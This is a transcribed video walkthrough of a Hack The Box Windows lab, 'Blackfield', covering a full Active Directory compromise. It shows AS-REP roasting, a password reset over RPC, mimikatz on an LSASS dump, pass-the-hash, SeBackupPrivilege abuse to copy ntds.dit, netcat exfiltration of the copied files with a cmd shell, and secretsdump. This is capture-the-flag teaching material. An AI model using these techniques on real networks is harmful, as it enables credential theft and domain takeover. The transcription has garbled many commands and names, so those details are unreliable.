आएको के भन्दाखेरि चाहिँ मैले ह्याक द बक्स को एउटा मसिन कुन भन्दाखेरि ब्ल्याकफिल्ड भन्ने यो मसिन छ। म चाहिँ यो मसिन 40 पोइन्ट्सको मसिन, यो हार्ड क्याटेगोरीको मसिन हो अनि यो चाहिँ विन्डोज मसिन हो। यो मसिनलाई कसरी सल्भ गर्ने भनेर चाहिँ म देखाइदिन्छु। मैले चाहिँ यसको युजर र सिस्टम दुइटै अन गरिसकेको छु गर्न चाहिँ। सो अब यो मसिनलाई अन गरिदिउँ। रेटिङ पनि 4.9 छ out of 5. It's been rated 4.9, so it is kind of difficult and kind of realistic. Usually the servers or Windows systems we find during pen testing is quite similar. So let's go to our VM, insert our VPN. And then starting away with let's ping the machine first. So यो blackfield.stv भनेर चाहिँ कसरी आयो भनेर if you don't know, I have added an entry in etc file already. So I have a blackfield.stv, blackfield.local, which I have already defined as domain names. So let's quit this, and now we have the machine online. So let's go for a quick port scanning. And so I use this to scan the ports quickly, and it's been defined in hack the box starting enumeration page 2. So you can simply write blackfield.stv here, and you can let it scan for different ports. And in the meantime, we can check if it has any web page or something hosted in port 80 or 888, something like that. I try to go to this machine not directly in the solution, but different methods, the methods which fails too. So this might take a little time. So our machine is BlackField. So I don't think there is any web page or anything. Okay, I don't think there is any web page hosted here. So yeah, let's cancel this. Actually, I do have okay, I have mmap already done here, so I'll open the mmap file. So this is the result of the mmap. We have port 53, which is domain control DNS, and then we have 88, which is Microsoft Kerberos, which handles all the security related stuff for authentication, remote authentication, and all those things. And we have 135 for Windows RPC, and then we have LDAP. So LDAP, it's a Active Directory server, so we do have LDAP port open here. And the other important port we have is 5985. So this is HTTP API You can use this port to authenticate to PowerShell uh, too, and if you have a valid set of credentials. So the things we can go for enumeration here is we can enumerate Kerberos for sure. Also we have LDAP, we can go for Active Directory enumeration and all, and also uh, we have SMB port, maybe some shares or something like that that we can look upon. So let's start with LDAP, because most of the times these box are related to LDAP. So we'll use a tool called enum for Linux. So let's start creating a node too. We'll create a node in this is for the machine BlackField. So we'll go for LDAP. We'll be using tool enum for Linux using blank credential because we don't know anything at this point. Okay, and then we have BlackField. Okay, so with this we can also check if this server allows null authentication or not. So we have transferred a username and password as blank. So okay, it didn't say like anything like the server doesn't allow null authentication, so maybe the server allows null authentication, but we did not get any information except the SID of the domain, and it says host is a part of a domain, so we did not get any information here. Let's try it another way around. Let's remove this -u and -e option. Let's see if it works, because sometimes it works like that. We don't have any output from enum for Linux, so nothing. And another port we have here which we can enumerate is 445, which is for SMB Samba. We'll start enumerating SMB port. So for that we'll be using SMB client. Let's go with SMB client. So SMB client, we can use -L for listing all the available shares on the domain. So we'll be using blackfield.html. So it will be asking us for password, so we don't have any username or password at this point, so we'll try to use null authentication. Okay, we have 1 2 3 4 5 6 7 different shares on this server. The forensic share seems to be okay. Let's keep a note of this. We'll keep a note of this. The forensic share quite interesting. We'll be trying to get into the forensic share, so maybe we find something. Okay, we have BlackField local, and then we can give forensics directory. Okay, we are inside forensics directory. Current directory is blackfield.local/forensics, and we'll try to do ls. So it says status access denied, so I don't think we can do anything in here. Let's try put something, say user.txt. I think I do have that file there. I don't. So user.txt only exists. I don't think we have any access in here. So what you can do is, we don't have put access, we don't have ls access. So let's try some different here. That we have other sets too. So let's exit this, and then again we have a share called IPC. I don't think we have access on admin and C. So let's try this IPC, and we'll be trying profiles. Okay, we don't have access here too. So let's go for profiles. Okay, we have access here in profiles. So we got a lot of directory in here. So it's in everything is a directory, and the third parameter here is the size. So we can check the size of each directory, and each of the directory size is 0. So what can we do with this? This looks like there are usernames on the machine, kind of like usernames on the machine. So what we will do is we'll select this, all these names, copy this, maybe use a subline, or let's say di. Let's create a directory here called BlackField, and then we move to BlackField. We'll create a file here called directory. So we'll paste all the data here. Okay, we have this. So let's say what we can do is we can use the cut command to get only the first parameter from the list. Text parameter like minus d for delimiter, like what you use the parameter used to separate the parameters. Let's use space for that, and F for which fields we want to access. So let's do F1. Okay, file name. We need to give file name too. So doing this we don't get anything. Okay, maybe we need to use a different. Do we have a space in here? Okay, we can do one thing. We can use sublime. What we can do in sublime is we can find and replace to control adds, and what we can do is, okay, if space is the delimiter, then first, second, third, I guess it's 3. So let's try 3. Third field. So in third field we get all the usernames. So we can create a user.txt file in here, and then we have all the users. So okay, now all we have is users. So one thing what you can do is in SMB client, once you get in, since there are a lot of directory in here, so if you want to recurse into all the directory, you can simply type recurse and then ls. So what it does is it lists all the directory, and then it recurs into all the directories. So you can check if any files are there, but since we can see all the directory sizes is 0, so there won't be any file inside. So let's not waste our time there. And yeah, what we now have is we have a list of users. Possible users, still we can't see since it is inside the profiles directory. So profile directory will have a folder for each user where you can store configurations and all in the actual Windows servers. But in our case we only have folders, so maybe there are possible users or usernames for the machine. So what we can do is we can use Metasploit module to brute force the credentials for Samba. We can try this username, and we can also check for null authentications, which requires no password and all. But again, let's look at our nmap if we can go further. Also there is Kerberos, so we have a lot of scripts in Kali Linux where we can find different Kerberos tools. So you can search for SMB login. This module is used to brute force credentials, so we can simply write use 0 and we can look at the different options. But the thing is, the box in ActaBox don't have a lot of boxes where you need to brute force anything, so I don't actually, I know it doesn't work. So anyway, you can brute force credentials since you have a list of usernames, because most of the users might set the password as their username itself. And yes, you can provide user file here, also the pass file, and then you can set rhost, where you'll set the machine host to the IP of the machine, and you'll hit run to brute force the credentials of the machines. But yeah, ActaBox doesn't have a lot of brute forcing machines now, so we'll try that later. But first, what I realized is we have Kerberos on the machine, so it's accessible and open. So we have a script called, excuse me, get np users, where you can enumerate all the usernames without using password. So we can move to directory user share doc python 3 packet. Okay, there is a repo called python 3 in packet where you will find a lot of example scripts which you can use to crack different things in Windows machines. So what we are going to use is this one. So we have python 3 or python. They are executable, so you can directly execute them. So let's look at different parameters that you can pass to it. So at this point, what we know is we know the machine name is BlackField.local. It's called BlackField.local in its net BIOS, so it's like BlackField.local. And now what we know is we have a list of possible users. So let's look at what we can do with those. Okay, we have no pass, don't ask for password. We can use that. And also we have yes, we can use user file. So we have a user file, and we also have a domain name. So let's try that. Get np users. So we don't have password. Okay, let's specify the machine first. So it is blackfield.yahoo, and then we don't have the password, so we write node pass, and then we have a user file. User file which is located at user text. Yeah, let's run this. Okay, what it says is unrecognized argument user file. So let's check what the user file actually was. Users file. Okay, we missed a s in there. Okay, it says client not found in Kerberos database. Okay, it says user audit does not have pre-required pre-auth set, so we can keep that as a note. Okay, there is audit 2020 user, so maybe it's some security audit going on. We also saw a folder name called forensics, so maybe some audit is going on, so we can also take a note of that. Audit 2020 happening. So we don't see anything. All those usernames doesn't seem to exist, but yeah, the username called audit 2020 does exist, and for all the other usernames, the Kerberos is saying that the client is not found. So till then, what you can do is we can again use smb client to get into some other directories. We had C dollar. Maybe we can find something else. Okay, status access denied. Maybe, okay, it doesn't matter at all. What are the shares actually? We have sysvol. Okay, seems like we got something in here. Let's copy this and check what it is. Okay, I think it's running now. Okay, so at least somehow what we did is we figured there is a list of usernames on profiles, and we used those usernames to enumerate Kerberos using the usernames, and we found a hash for user support. So we're trying to get password for support. It's taking some time. Till then, okay, now we can check the status. What we did was what our mistake was is we had to copy starting from here and ending at here. What we did was we copied the hash from here to here, and Prakash was right. Actually, we had to mention KRB5ASREPS also there to actually correct the hash. That was the mistake that we had been doing. Okay. Okay, it's been cracked. So we got a password here for support. So the username is support. We got password that is Black Knight. So what we can do is we can try to log in. We can try to log in using Evil Winner. So here our machine name is BlackField.htb and user is support. The password that we found is Black Knight. Maybe it is interpreting that as okay. So one thing interesting is what we found is we have a forensic share. So maybe support is allowed to access that share. Let's check that too. So we can't authorize we can't log in with these credentials in the machine. So maybe we have something inside forensics that we need to figure out. So let's try logging into forensics using the user support. Okay, the password for support. Then it says login failure. Let's try it again. Okay, we are inside, so try ls. Okay, we got a status denied in this too. So what we can do next is we can try logging into RPC client to go for further enumeration, since enum for Linux did not work and we know that we have LDAP. So let's go with RPC client. Okay, RPC client, yes, you. So we know the domain name, it's like black hat, blackfield.global, blackfield.local, and then we have username support. And then the system is, so what is the IP address of the machine? It's 192. So we have the credential here. So basically what we do in RPC client is that we try to enum different things. So enum, we can check the enum users or enum domains first. Check the domains. So we know one domain is blackfield.global. So one of the domain is Blackfield and the other one is built in. So we have Blackfield domain. And another thing we can do is enumerate domain users. So okay, again we have a lot of users. Also we have some February and then SPC backup, and then we have a lot of Blackfield users. So we need to take a note of all these two. We have administrator, we also have a guest account, and we have audit 2020 as a user that we knew already, and we have a user support that we have logged into in for RPC client. So let's copy these two. Let's make a note of this too. Okay, so we can already extract important credentials like SPC backup. This seems to be interesting, and then this one seems to be interesting, and until we have audit 2020, it seems to be interesting. The other seems to be fake, so we have support already and the administrator. Okay, so these are the users that might allow us. So looking at the username, I can already say that audit 2020 has full access inside, the forensics directory. So we'll try to get something about the audit user. Okay, inside RPC client, we can do a lot of other things. We can enumerate drivers. Okay, we don't say anything. We can enumerate printers. There are cases in which you will find the domain credentials of a printer, and then you can log in into a domain controller using the credentials of a printer. And then we have, let's enumerate privileges. So enum to check what privileges do we have. Since we have got a username called support, this must be responsible for providing support to different users. So we must have actually a lot of privilege. So we can see we have actually a lot of privilege assigned to us. So maybe there's something fishy that we can do. Okay, let's cancel this now. And then privs. So we have create token, lock memory privilege, and then the important one, like kind of security related. So we have take ownership privilege. So we can take ownership over different users. So what we do is we try to take ownership of a user. So we can change password, change password of a remote, change password of using RPC client. Okay, let's see if we can change password. Okay, reset AD password using Linux. So maybe we can find something here. So this is to authenticate. Set user info to username, level, password. Okay, level, our level is 23, so we figured our level was 23 here. I should be creating subnodes, so let's create a subnode now onwards. Reset. Okay, let's save it now. So we have set user info to, let's copy the uses, and then let's create a command set user info to, and then username is audit 2020. So level is 23, and then we set a new password. So the password we can set is, and since Windows has Windows domains have password policies, we'll create a password that satisfies almost all the policies. So let's try this. It has got a capital letter word, capital letter, and a symbol and a number. So let's go with this. Okay, it did not throw any error message, so maybe the password is modified. So let's try one thing. Let's try logging in as audit user. So using evilwinrm. So evilwinrm is a tool that lets you log into a Windows machine if you have the credential for them using a PowerShell. It logs you into a PowerShell cell. So the user we have is audit 2020 and the password that we have set is okay. Let's take a note of this too. Okay, I already did. So we have username audit 2020 and I have a credential now that is maskop9. Okay, I don't think we have any access in there, so let's go here. Now what we know is the audit user has access to the forensic share, so let's try accessing the forensic share with this. Maybe it was this terminal right here. So SMB client, and then we have forensic, and how do I pass a user? It's capital U audit 2020. So we have a password for this user now. Okay, I should be able to access it. Okay, yeah. Now we got access into SMB share, the forensic share. So maybe, okay, we have command output folder, we have memory analysis, and then we have tools. So as I said earlier, we can use the recursive ls to check if we find something fishy in here. Oh, there are a lot of tools. These are all forensics tools, might be handy sometimes. So yeah, we have command outputs, and inside command output we have domain admins, domain groups, domain users, firewall users, ipconfig, netstat root. Okay, maybe sometimes and I don't think they have any credentials in these files. Domain admins, domain groups, this. But anyway, let's try. Inside command output cd. Okay, let's turn off the recursive mode now. So we can check these files. Okay, we don't have cat. So what do we have? Type. Okay, we don't have much commands, so what we can do instead is cd sudo cd/md. Okay, it says command not found. Okay, we can create a directory here called forensic. Okay, Okay, so dir forensic, and what you can do is we can mount the serial using the command mount -t cifs plus 10 192, I guess. Okay, forensic. Okay, forward sudo. Okay, it says permission denied again. Maybe I gave it wrong password or something. Let's try it again. Okay, it's done. Select forensic, and then we have all the files in here. So now we can run our actual commands like cat and all. So sometimes it's kind of messy dealing with Windows and Linux at the same time. Okay, I pawned your computer. Seems like someone already got administrator access, and this doesn't seem to be a password, I guess. So maybe it is, I don't know. I don't think so. So we don't have actually anything in here. Let's try this too. We don't have anything in admins. Okay, this seems to be a mess actually. The only thing I think is usable here is audit 2020 administrator, and then okay, this seems to be a username. I pawned your computer seems to be a username. So I guess the audit team actually pawned their system to register a new administrator account named I pawned your computer. I pawned you company. Okay, so maybe that's what happened. And now what you can do next is, let's see, maybe they have the credential for this system account, but actually we don't even have a user account yet. Okay, so let's go back and check out the folders. Memory analysis. Okay, okay, looking at these files, you might need to Google everything, like what does actually conhost do, or what does ctfmon do, or what does dfsrs does. So actually I have the idea about this lsass.zip file. So not actually zip, but that's an executable file, lsass.exe. Oh no, sorry, it's not a domain. So what this does is it is responsible for logging users into any local machine. So every time you want to log into a Windows computer, whenever you type your password in the login prompt, the process to handle your credential or to check your credential is called LSASS. It's a local security authority subsystem service. So what it does is as soon as you log in, it saves your NTLM hash as cats until and unless you restart your system. So the forensics team actually dumped the LSASS zip file, so let's go and get it. Let's see if it has any credentials in it. Okay, inside mount we have forensics, and inside forensics we have memory analysis. Here we have LSSS. Okay, let's copy this file to our directory called BlackField. So where did our directory go? Okay, let's copy this here. Okay, it's 40 MB. So what I did is I already have this file, so let's cancel this. Now what you need to do is we can use mimikatz to actually extract anything, if anything is inside there. So mimikatz has awesome methods which you can use. So let me launch mimikatz for that. Okay. Okay, here I have mimikatz. Okay, Windows Defender keeps on removing the mimikatz, so I thought I had it. I even thought I whitelisted that, but okay. Okay, I have it here. I have it whitelisted, and okay, the dump file, lsss dump file, we have it here, and then we have a mimikatz there. So we can do is url, let's say, and then we can call mini dump, and we can say we want to look into a local file that is lsass.dmp. So now what we can do is sec url, let's say. We can search for login passwords using login password. Okay, we got a lot of them, I guess. So as you can see, we can get username, credentials, everything from the lsass.executable if you dump that file. So basically it means if someone has logged into their computer and you dump their lsass.exe, then obviously what you will get is the credential they used to log in, and that will be saved as an NTLM or even plain text password in some cases. But in our cases, all these usernames like DC1, BlackFields, and some random number are dummy accounts. So we got password. So basically, we don't get password in here. All we get is NTLM like this. So on our list of valid users, we had this user. So what we can do is we can copy this using enter and then go back to our VM. Go back to nodes and then create a new subnode that is lsass.dmp. So what we got from that is we got a user name that is spc_backup, and we got an NTLM for that user, that is this. So as we know, we can use NTLM to log in into a Windows system using a -hash option in -H option in evil winrm. So what we do is, okay, we go back to BlackField again, and then we can use evil winrm to log in into 10.10.10.192, I guess, and then -u, we got spc_backup, then as for hash that we got, that is the NTLM for the user. So let's put this. Okay, sorry. I hope this gets logged in. This is the third username and password that we have found for the machine, and all of them are valid, yet we are not able to get inside the machine. But now, as you can see, we are inside the machine and we can run commands. So basically, who am I? Okay, we are SPC underscore backup inside BlackField machine. So what you can do now is, so basically the point in hack the box is to get the flag. So maybe this is the user where we get the flag. On Windows machine, typically we find the flag inside, on the desktop. So let's move to desktop and let's check if the flag exists here. Okay, we have the user flag here, so you can submit this user flag. Okay, this is live machine, so I guess I should not be disclosing the flags. Anyway, no problem. Okay, what's wrong with this? Okay, now what we can do is /all to check every privilege that we have. I keep getting confused about this slash and backslashes. Okay, these are the privileges that we have. Let's copy this and let's create a subnode saying post enumeration. So okay, what we have here is backup privilege. So since we have already taken 55 minutes, so I'll go right into the point. But what you can do is you can use different tools, like you can use WinPs. Inside tools I have, okay, here I have WinPs, cd WinPs executable, and then x64 or something like that. Okay, WinPs, then we get bin x64 release. Okay, here we have winpiece.exe. So basically what you can do is create a Python server here, Python 3 some dp.server. Okay, so I gotta show this. Most of us have difficulty using PowerShell, so what I figured out is we can use shortcuts in PowerShell too, like for the shortcut for invoke wave request, instead of typing invoke dash wave request with all those capital letters and small letters, so we can simply write IWR, which stands for invoke wave request, and http:// so what is my IP? 14.11.10.10.14.11, and then 8000/winpiece.exe minus out file for the file name to save it as. We can use winpiece.exe. Okay, what this basically does is it will download, to invoke a wave request to 14.11.8000, and it will get the WinPiece here. So yeah, what we can do is we can run WinPiece here. So Windows Privilege Escalation Awesome Suite is what it stands for, and what it basically does is it checks for all the misconfigured or any vulnerable programs that has been installed in the system to which can lead us to administrator account or domain administrator. So it checks for all different things, and it highlights everything that is wrong or that it suspects is a way to administrator as red. So we'll only check the things that are red, so name doesn't give us anything. So yeah, credential card is not enabled, LSA protection is not enabled, labs is not installed. Yeah, we can do this. So basically this won't get anything. So yeah, the privilege that we have is SMS in account privilege, and we have backup privilege. So usually these uh, backup and restore privilege, they lead to privilege escalation. Even if you think logically, if someone is allowed to backup, so maybe he has a privilege to backup C drive or something like that. So maybe he can backup. So in case of Linux, if a user is allowed to backup anything, so he can also backup the shadow file that is located in etc. So similarly in Windows also, the concept exists. It's just that the Windows internals are a little difficult to grasp, but it's not like it's impossible. So let's Google for Windows SE backup privilege. Actually, I have all the tabs ready since we have wasted a lot of time. So let's go back to the Windows machine. So if you Google for SE backup privilege exploit, you'll get a lot of links. Even you'll get two different DLLs that you'll be using. So SE backup privilege. If a Windows user has backup files and directory, right? He gets assigned the SE backup name and SE backup privilege. So yeah, using that privilege, what you can do is you can create a backup of C directory where uh, basically what we need to do is we need to get a file called root.txt that is owned by administrator. So yeah, if you try to back up the root file using copy file sc backup privilege, so uh, just because we have backup privilege doesn't mean we can simply copy any file that is within administrator, right? So we have to do it in certain way to utilize the privilege. So the command for that is using PowerShell. We can do that using copy dash file sc backup privilege command. So what is basically does is it copies the report from the current directory, which is a private directory for some user, to temp directory. And so what it says is it has copied it. So basically I tried the same on the machine, but unfortunately the root flag seems to be locked and we cannot back up the root.txt file. So we need a way to get root shell itself. So we need to find a way to get administrator access. So if you go to the results on the Google and if you check out 2 to 3 different results, uh, what we land with is a presentation. So okay, even this got a brief description about the backup privilege. Okay, it may be beneficial to hunt for service accounts that have this privilege. For example, if you can gain access to backup service account, it will almost certainly have the SE backup privilege and SE restore privilege. Gaining access to these service accounts can be accomplished in a number of ways, including the following. So it basically teaches us to get access, and it basically has a GitHub link. So the same GitHub link that we have here, and if you Google, if you check out Google a little more, what you find is you'll find this presentation. Uh, so this presentation is about all about Windows privilege escalation. So the title of this presentation is "Show me your privileges and I'll lead you to system." So this was presented in Black Hat conference, I guess, few years earlier. So what we have here is what we got is backup privilege. So this allows the user to circumvent file and directories permission to back up the system. So the privilege is selected only when the application attempts to access through the NTFS backup application interface. Otherwise, the normal file and directory permissions apply. So with this privilege, you can easily back up Windows registry and use third-party tools for extracting local NTLM hashes. Okay, so basically what it says is with this privilege, with the backup privilege, what you can do is we can save the registry like HKLM stands for local machine. So uh, basically the current user uh, registry hive contains all the registry keys for our current user, whereas HKLM contains registry keys for all the users. And this is a vulnerability that exists in previous versions of Windows 10, but the latest builds have patched, and now Windows 10 doesn't allow us to access the local machine registry with a low privilege account, and we can only access current user registry keys. So what we can basically do is we can use the regsave command to save the local machines registry, and then again there is a file called uh, dit file, which is ntds.dit, which stores all the domain controller configurations, like all the credential for a domain controller, all the hashes of domain admins, domain users, everything, group settings, everything is stored into this database file. This is a database extension dit. So this is a Windows database architecture. So we can use different tools to extract credentials from this, but to extract the credential from this we will have to use the registry key values for local system. So what we can do is we can use the backup functionality to back up the file ntds.dit, which we are going to do now, and then we'll create a hive for the registry. So basically what regsave does is it saves the current registry key value pairs into a file specified by the user. So we'll shift the local machine registry keys into system.hive, and then we'll back up the file uh, ntds.dit, and we'll figure out a way to extract credentials from these files, and then we'll use the credential to get access to the administrator account. So let's go right way into it. So let's go back to the VM. Okay, so here we have access to that. So basically what we do now is we need both the DLLs. So instead of the uploading using a Python server, since it's a little laggy, what we will do is I have those DLLs here inside the tools folder. So win privilege plus SC backup privilege, inside bin, inside debug, I have these two DLLs. So I'll copy these DLLs to BlackField folder. So this is where we are inside here. So basically what we can do is control1 cd BlackField ls for the file names. So simply copy this and use upload command. So prior to that we can create a temp directory in C. Okay, mkdir /tmp. Okay, we go to temp directory. Then basically what we can do is we can use the command upload to upload this file. Upload successful, and then we'll upload this file here. So basically these two are libraries that we will be using to invoke the command PowerShell command that was copy files SC backup privilege to actually back up ntds.dit file, the database file. Yeah, so next what we are going to do is we have a way to actually create a disk shadow. So basically most of us know what a disk shadow or shadow copy is. So we'll create a disk shadow using these commands. So basically let's copy all of this in our notes. So basically what we can do is set context persistent no writers, and then add volume C. Since we need to create a shadow copy for C, alias new one. So let's terminate this with hash, and then we have create, and expose percentage new percentage as G. So we'll expose the shadow copy as a new drive, that is G drive, and then we don't need to delete shadows. So yeah, I guess this is enough to do it. Okay, yeah, we'll save this file as disk shadow text. Set context persistent non-writers, add volume C alias new one, create, and then expose. Okay, seems all right. Let's upload that here too. Sorry. So we have uploaded the disk shadow.txt, and then we can always execute command prompt using cmd /c, and then we can execute the command disk shadow to create a shadow copy, and we can pass the commands. Since we don't have an interactive cell, we'll be using this approach to send the commands. So the commands are in disk underscore shadow dot text. So basically we'll run this. Script file not found. Okay, maybe the file name is disk shadow. Okay, seems it worked fine, I guess. If it worked fine, we will have a directory G, but we don't have it, means it did not work. So let's check why it did not work. Oh no. Okay, set context persistent non-writers, and then add volume. So alias new one, create, expose. Okay, we made a mistake in here. We gave it a name new one, but we only wrote here new. So yeah, let's fix this quickly. And then we'll run this again. So let's see if this worked. Still not. Something still wrong with this. So maybe the space is causing a problem there, because it can't parse the drive letter. Okay, the shadow copy was successfully exposed at Z drive. So now what we can do is we can go to Z drive, and if we ls into Z drive, it's basically C drive that has been backed up here as G drive. So what we need to do is first of all, let's go back to C drive and cdtmp. Okay, we are already in temp directory. So yeah, we had a command called regsave, which we can use to save the registry. So yeah, hkln, which stands for hkey local machine, and then for system, let's check it. Okay, I guess it's correct. System, and let's save it to ctemp. System.hive. This should do the job. Okay, so basically if you want to check what this file contains is it contains all the key value pairs for the current local machine registry, and it's not readable simply by opening it in a text editor. So let's let it be there. So next what we do is we load these two libraries using import module. And for current directory, we'll use this in PowerShell. So let's load this first, and then let's load this module now. Okay, now what we can do now is we can call the thing copy file se backup privilege now. So let's use that copy file se backup privilege, and then what we need to do is, so basically we need to copy the dit file, and where does it stays? Okay, so where is the dit file? C Windows NTDS is where it resides. So let's go back. Windows NTDS slash ntds.dit, and copy it, back it up as temp ntds.dit. So basically what we are doing is we backed up the ntds.dit, which is a database file which contains all the things about Active Directory to our backup. So if we ls, you can see we have ntds.dit and system.hive. Now we have both the files that this presentation specifies. So these are enough to gain all the credentials saved inside the machine. So what you do is go back here to let's open a new terminal, cd BlackField. Okay, there is a command called rlwrap. So what it basically does is it logs everything you do inside a command shell or a terminal. So we'll use rlwrap to listen to netcat connections. So prior to that, we need netcat. So yeah, let's copy netcat first. File system, user, share, Windows binaries. Okay, we need netcat. Let's copy netcat and then put it inside BlackField. So what we can do is we can simply write upload get.exe, and then we can use rl wrap to actually so what we are trying to do here is we are trying to copy the content of system.hive and ntds.dit to our local machine. So basically what we are going to do is we are going to netcat into our system, that is 10.10.14.11 and put 1234. So what we actually pass here is system.hive. So and then in our system what we will do is rl wrap to actually save the contents into a file, and lpnp1234, and then we'll provide system.hive. So this is where we will store whatever we get. So we can also do cd BlackField plus minus l system.hive. Okay, now the file content is 0. So basically what we are going to do is we are going to send this file from here, and we should be receiving that file in there, but we have not been. Okay, so we are in a PowerShell, so we need to specify the path for the netcat. So let's see, netcat.exe. Now we should be getting it. Not yet. Okay, maybe we're missing something in netcat. Okay. I need to provide the port for that. No, we need a port 234, and then we are providing it to what's wrong. Okay, let's simply do one thing. Let us simply listen first. Let's remove the rl wrap too. Let's get a command cell in the machine first. So yeah, what we can do is 1234 minus a cmd.exe. Okay, now we got a command cell. Here we can do netcat.exe 10.10.14.11, and then here we can use this sign to actually pass a file. So system.hive. I guess I'm correcting that. System.hive. Okay, so let's do one thing here, that is rl wrap netcat minus lbnp, and then 1235, since 1234 is already in use, but here I forgot to mention the file port. System.hive. And then not here, cd BlackField rl wrap netcat 1235 lpnp system.hive. Okay, I think it's all correct here. So we are starting to receive the file. As you can see, the file size has been increasing. Now we keep on doing this until we get a constant value. Okay, not yet. Not yet. Not yet. Not yet. Okay, it's being downloaded yet. Yeah, I think it's done. Yeah, we're getting a constant value now for the size, so it's fully downloaded now. So yeah, let's close this listening cell. And then what we can do now is, now we need ntds.dat file. So yeah, again do this, and then now nc.exe 10 14 11 1 2 3 5, and this time we'll pass ntds.tit. Yeah, I guess it's all correct here. Oh, 1 2 3 6. Okay, I don't want to type it again. 10.10.14.11 1 2 3 5 ntds.dat. Okay, so this time ntds.dat. So yeah, starting to get it. So it's gonna take some time. So basically now what we are going to do is, using these two files, we hope to extract the credential for system, that is administrator, or the other user that the audit team has created. So but the other user the audit team has created does not have a login cell, so uh, we need to go with the administrator credentials. Now let's so until then, in here, okay, slash user share doc python 3 dash impacket examples. Here we have a script called secret.py or something like secrets.py or something like that. Let me look for it. Okay, let's do this thing. Secret star dot star. Okay, we have secrets dump.py. So we can use this file to actually dump everything from the dit file. So ntds, we can give ntds file to parse, and then we can also give system hive to parse, and then it basically gets us everything that it can get from those files. Again, this is a Kerberos enumeration tool. So yeah, if we are already downloaded the file, yeah, the file is ready. Now what we can do is, you can use this. Okay, what is the command for system? Dash system for system hive. Okay, it's in BlackField system.hive, then probably ntds, I guess. Oh yeah, ntds for the ntds file, and then that is located in BlackField ntds.git. Okay, okay, something is missing. So okay, yeah, the target. Since we have both the file local, we can simply specify local for a local target, and then it can do its job. So basically I think the Windows uses boot key to actually encode passwords and all. So 0 found and decrypted as of now. So as I already told, entts.dit file stores all the uh, credential for each and every user on the domain. So basically, whenever we are doing uh, domain hash dump module in Metasploit, basically what we are doing is we are making a backup of entts.dit file, and then we are running a script something like secrets dump to actually gain this output. And then now we have this is what we are looking for. And then yeah, let's say AD has, and then we can use this NTLM, or let's say only this part of the hash to actually log in. And then the username is administrator. As usual, we can use evil winner to log in as administrator, and then no, we don't actually have a password, and it's not good cracking it now. So yeah, we can use hash for login. So yeah, now we are logged in. So now I am the administrator for the machine BlackField, and now so we can go back, we can go to desktop, and as you can see there is a root.txt which you can submit to gain root points and obtain the 40 points for this hard machine. And yeah, there is node.txt. So basically this was the reason why we were not able to back up the root file. If we are able to back up the root file directly, we did not have to back up the ntts.dit file and the system hive to actually extract administrator credential. But what they did is they protected everything with the password inside this directory. Since the audit was going on, the because the audit report is sensitive, I have encrypted it on the desktop, so that is root.txt. So yeah, basically we did not have access to that file at that time, so now basically we can access it. And you can submit the hash. So basically, to repeat, what we found was we found ports like DNS and Kerberos, and then SMB and LDAP. So basically, enumerating for LDAP, we did not find anything, and but we found some SMB shares, out of which only profile share was accessible, and had a lot of folders with usernames, since it creates every folder for every user on profiles directory. So we found a list of users which we recorded as possible users, and upon enumerating the users using Kerberos, we found a hash for support user, and then we used the hash to decode. We used hashcat to actually crack the hash, and we got a password called Black Knight, and then we used that password, support password, to connect to RPC client, and then we got some more users. And then again, while enumerating the privileges of the service user, support user, we found that the support user has privilege to change credential for any other users. So what we did was we used set user info 2 command inside RPC client to change the password for audit 2020 user, and we set our custom password, and then we got into we were not able to log in using the audit, as there was no cell assigned to it. And then what we did was we got inside forensics there, where we found a lot of things. And then what we did was we went into the memory analysis, and we found lsass.zip, since lsass.exe is responsible for handling all the passwords and authentication stuff on Windows. So basically local authentication on Windows. So basically we downloaded that file, and inside we found a DMP file, where we used Mimikatz to actually load that lsass.dump file, and we searched for login passwords, and then we found a password for SPC backup account. We actually found NTLM hash, and then we use evil winrm to get inside uh, the SPC backup account, where we find user hash. And then after that, for a local privilege escalation, we did post enumeration, where we found two suspicious privileges provided to the SPC user, SPC backup user. So as the name indicates, he has backup privileges. So we used SE backup privilege to gain root access. So to gain that, what we did was we loaded two different DLLs to call to actually execute backup command in PowerShell, which is okay, where is it? Copy SC backup privilege. That is the command. So this has been defined in the one of the DLL that we imported earlier. So yeah, so we used import module command to upload those DLLs, and then what we did was we created a shadow copy for C drive as Z drive, and then we used the backup uh, privilege that we had to back up the ntds.dit file, which is a database file for domain credentials, and domain controller, which is a database for domain controller, which contains all the information about domain controller, like user, groups, and then NTLM hashes for each users. Uh, and then what we did is we also created a copy for the local machine registry hive, and saved it as system.hive. And then what we used was we used an impacket example script, that is secret stump.py, and we passed the parameter system.hive and ntds.it as, and asked it to pass it as local. So we got the administrator credential there, and we used winrm to get into the administrator cell to get the admin flag, root flag.